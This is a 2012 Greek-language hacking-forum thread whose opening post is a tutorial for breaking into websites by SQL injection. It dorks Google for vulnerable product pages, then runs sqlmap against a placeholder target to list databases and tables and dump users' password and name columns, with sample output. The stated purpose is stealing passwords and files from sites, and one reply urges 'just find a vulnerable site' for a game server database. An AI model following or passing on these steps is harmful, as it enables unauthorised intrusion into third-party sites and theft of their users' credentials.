~Grey Hat~ Posted May 21, 2012 Share Posted May 21, 2012 Eiσαγωγη Καλησπερα σε ολα τα μελη και χαιρομαι που σας βρισκω μιας και ειναι το πρωτο μου ποστ στο section! Οπως γραφει και στον τιττλο σημερα θα σας δειξω πως κανω εγω sql injection σε μια ιστοσελιδα και υποκλεπτω αρχεια ,κωδικους κτλπ.! Tι θα χρειαστουμε? Για να γινει αυτο θα χρειαστουμε λειτουργικο συστημα BackTrack R1!Eιναι λειτουργικο συστημα των Linux!Μη φοβαστε δεν χρειαζεται να βγαλετε τα windows σας η οτι αλλο χρησημοποιειτε!Θα ανεβασω αργοτερα ενα guide για το πως θα το τρεξετε! Αρχικα πρεπει να βρουμε αν η σελιδα ειναι ευαλωτη σε επιθεσεις, για να το κανουμε αυτο θα χρειαστουμε καποιο προγραμμα! Παρακατω εχω 2 link με τετοια προγραμματα! Downloads Dork XCodeExploitScanner Πληροφοριες Συνεχιζω...εκει που λεει Dork βαζετε τι τυπο σελιδας θελετε να ψαξει πχ αν θελετε για προιοντα inurl:product.php?mid= (θα σας βρει καποια που να σχετιζονται με προιοντα οχι ολα απλα ειναι ενας τροπος για να διαλεξεις που θα επιτεθεις) πατας dork it και σου εμφανιζει σελιδες,μετα Scan SQLi και ανιχνευει αν οι σελιδες ειναι ευαλωτες πατατε στο Open results καντε αντιγραφη και καντε επικολληση σε ενα αρχειο text το οποιο θα μπορειτε να το κοιταξετε μετα με Backtrack περιπου καθε μια αναζητηση που κανετε πρεπει να πατατε Show Captcha να βαζετε οτι βλεπετε στην εικονα ετσι ωστε να μην μπλοκαρει την ip σας η Google.. Ξεκινωντας Την Διαδικασια Λοιπον Ανοιγουμε ενα τερματικο στο backtrack και γραφουμε cd /pentest/database/sqlmap ,ωστε να ενεργοποιησουμε το sqlmap.Μετα γραφουμε ./sqlmap.py -u [ url ]--beep πχ ./sqlmap.py -u http://www.selidathyma.com --beep Οταν ακουσετε ενα beep τοτε το sqlmap βρηκε ευαλωτη την σελιδα.Συνεχιζω εδω...μετα γραφουμε ./sqlmap.py -u [ url ] --dbs π.χ ./sqlmap.py -u http://www.selidathyma.com --dbs θα μας εμφανισει τα Database πχ available databases [6]: [*] dswa [*] dswa_stage [*] dswawordpress [*] information_schema [*] mysql [*] test ./sqlmap.py -u [ url ] --tables -D [database] μπορειτε να επιλεξετε οτι database θελετε και γραφετε παλι πχ ./sqlmap.py -u http://www.selidathyma.com --tables -D dswa Database: dswa [table] [tr] [td][104 tables] +-----------------------------------+ | access | accesslog | actions | actions_aid | advanced_help_index | authmap | autologout | batch | blocks | blocks_roles | boxes | cache | cache_block | cache_content | cache_filter | cache_form | cache_menu | cache_page | cache_update | cache_views | cache_views_data | comments | content_access | content_field_headername | content_group | content_group_fields | content_node_field | content_node_field_instance | content_type_education_center_sub | content_type_find_alliance | content_type_member_home_page | content_type_member_page | content_type_page | content_type_page_ns | content_type_story | dswa_chapters_main | dswa_chapters_persons | dswa_eventuity_additional | dswa_eventuity_link | dswa_eventuity_main | dswa_profile_additional | dswa_profile_geographic | dswa_profile_images | dswa_profile_main | dswa_store_categories | dswa_store_featured | dswa_store_featured_sample | dswa_store_images | dswa_store_product_categories | dswa_store_products | dswa_taq_articles | dswa_taq_quotes | dswa_taq_tips | dswa_taq_topics | dswa_teleclasses_additional | dswa_teleclasses_main | dswa_teleclasses_speakers | dswa_whatsnew_main | dswa_whatsnew_order | fckeditor_role | fckeditor_settings | files | filter_formats | filters | flood | history | menu_custom | menu_links | menu_router | node | node_access | node_comment_statistics | node_counter | node_revisions | node_type | performance_detail | performance_summary | permission | profile_fields | profile_values | role | search_dataset | search_index | search_node_links | search_total | semaphore | sessions | system | term_data | term_hierarchy | term_node | term_relation | term_synonym | upload | url_alias | users | users_roles | variable | views_display | views_object_cache | views_view | vocabulary | vocabulary_node_types | watchdog[/td] [/tr] [/table] ./sqlmap.py -u [ url ] --columns -T [table name] -D [databasename] Παραδειγμα ./sqlmap.py -u http://www.selidathyma.com --columns -T user -D dswa Και αρχιζει βγαζει τους users...Αλλο παραδειγμα.. ./sqlmap.py -u [ url ] --dump -C [column] -T [table name] -D [databasename] πχ ./sqlmap.py -u http://www.selidathyma.com --dump -C pass -T users -D dswa πχ εγω τωρα στοχευσα να επιτεθω και να ανακτησω ολους τους κωδικους απο τα μελη που ειναι γραμμενα στην σελιδα <~~~ τσεκαρετε μια να δειτε. π.χ ./sqlmap.py -u http://www.selidathyma.com --dump -C name -T users -D dswa , και εδω τα ονοματα που εκαναν εγγραφη σε αυτη την σελιδα ~~~> Και ετσι μπορεις να υποκλεψεις στοιχεια απο διαφορες σελιδες..Τα παραπανω χρησημοποιηθηκαν σε δικο μου συστημα..Αυτος ο οδηγος ειναι παρανομος δεν ευθυνομαι για κακοβουλη χρηση του *ΠΡΟΣΟΧΗ μπορουνε να σας εντοπισουνε και να διωχθειτε ποινικα αν επιτεθειτε σε σελιδα. Ερχονται καλυτερα ποστ !Ευχαριστω Link to comment Share on other sites More sharing options...
~Grey Hat~ Posted May 23, 2012 Author Share Posted May 23, 2012 bump Link to comment Share on other sites More sharing options...
Voqus Posted May 23, 2012 Share Posted May 23, 2012 Ρε φιλε γιατι στον πεοντα κανεις bump εισαι σε tutorial section οχι request. Εαν ενδιαφερεται καποιος hacking θα κανει reply εδω η θα σε κανει pm. Jesus. Link to comment Share on other sites More sharing options...
~Grey Hat~ Posted May 23, 2012 Author Share Posted May 23, 2012 Κανω για να ανεβουν λιγο τα ποστ και να επισκεπτοντε περισσοτεροι το section.. Link to comment Share on other sites More sharing options...
sτrίkε- Posted May 24, 2012 Share Posted May 24, 2012 Κανω για να ανεβουν λιγο τα ποστ και να επισκεπτοντε περισσοτεροι το section.. Αραξε λιγο φιλαρακο. Σε καταλαβαινω οτι θελεις να ανεβει το section οπως θα το θελα και εγω, μα με αυτο π κανεις τωρα σκεψου οτι οταν ανεβει θα υπαρχουν αρκετα σχολια του τυπου bump. Link to comment Share on other sites More sharing options...
~Grey Hat~ Posted May 24, 2012 Author Share Posted May 24, 2012 Αραξε λιγο φιλαρακο. Σε καταλαβαινω οτι θελεις να ανεβει το section οπως θα το θελα και εγω, μα με αυτο π κανεις τωρα σκεψου οτι οταν ανεβει θα υπαρχουν αρκετα σχολια του τυπου bump. Ok ηταν λαθος! Δεν θα ξαναγινει..Να σου πω , καποιος παιζει με το reputation μου :/ πριν ειχα 1 τωρα 0 ..και νομιζω ξερω ποιος μου το αλλαξε και γιατι... Link to comment Share on other sites More sharing options...
Celebron Posted May 24, 2012 Share Posted May 24, 2012 Ok ηταν λαθος! Δεν θα ξαναγινει..Να σου πω , καποιος παιζει με το reputation μου :/ πριν ειχα 1 τωρα 0 ..και νομιζω ξερω ποιος μου το αλλαξε και γιατι... http://maxcheaters.com/forum/index.php?action=viewkarma Elfo who else? :S Link to comment Share on other sites More sharing options...
~Grey Hat~ Posted May 24, 2012 Author Share Posted May 24, 2012 http://maxcheaters.com/forum/index.php?action=viewkarma Elfo who else? :S Ευχαριστω φιλε..Τι να πεις..! Link to comment Share on other sites More sharing options...
Celebron Posted May 24, 2012 Share Posted May 24, 2012 Ευχαριστω φιλε..Τι να πεις..! Egw kai esu? tipota allos prepei na pei ... ekanan ena hacking sections kai apagorevonte ta dos otinane :/ Btw reported : http://maxcheaters.com/forum/index.php?topic=240156. Link to comment Share on other sites More sharing options...
~Grey Hat~ Posted June 4, 2012 Author Share Posted June 4, 2012 bump Link to comment Share on other sites More sharing options...
UnSponsored Posted November 11, 2012 Share Posted November 11, 2012 ginete kai gia l2 database? Link to comment Share on other sites More sharing options...
~Grey Hat~ Posted December 8, 2012 Author Share Posted December 8, 2012 ginete kai gia l2 database? ennoeite..arkei na vreis vulverable site Link to comment Share on other sites More sharing options...
maxcheaterz Posted March 14, 2013 Share Posted March 14, 2013 Thanks Link to comment Share on other sites More sharing options...
Recommended Posts
Please sign in to comment
You will be able to leave a comment after signing in
Sign In Now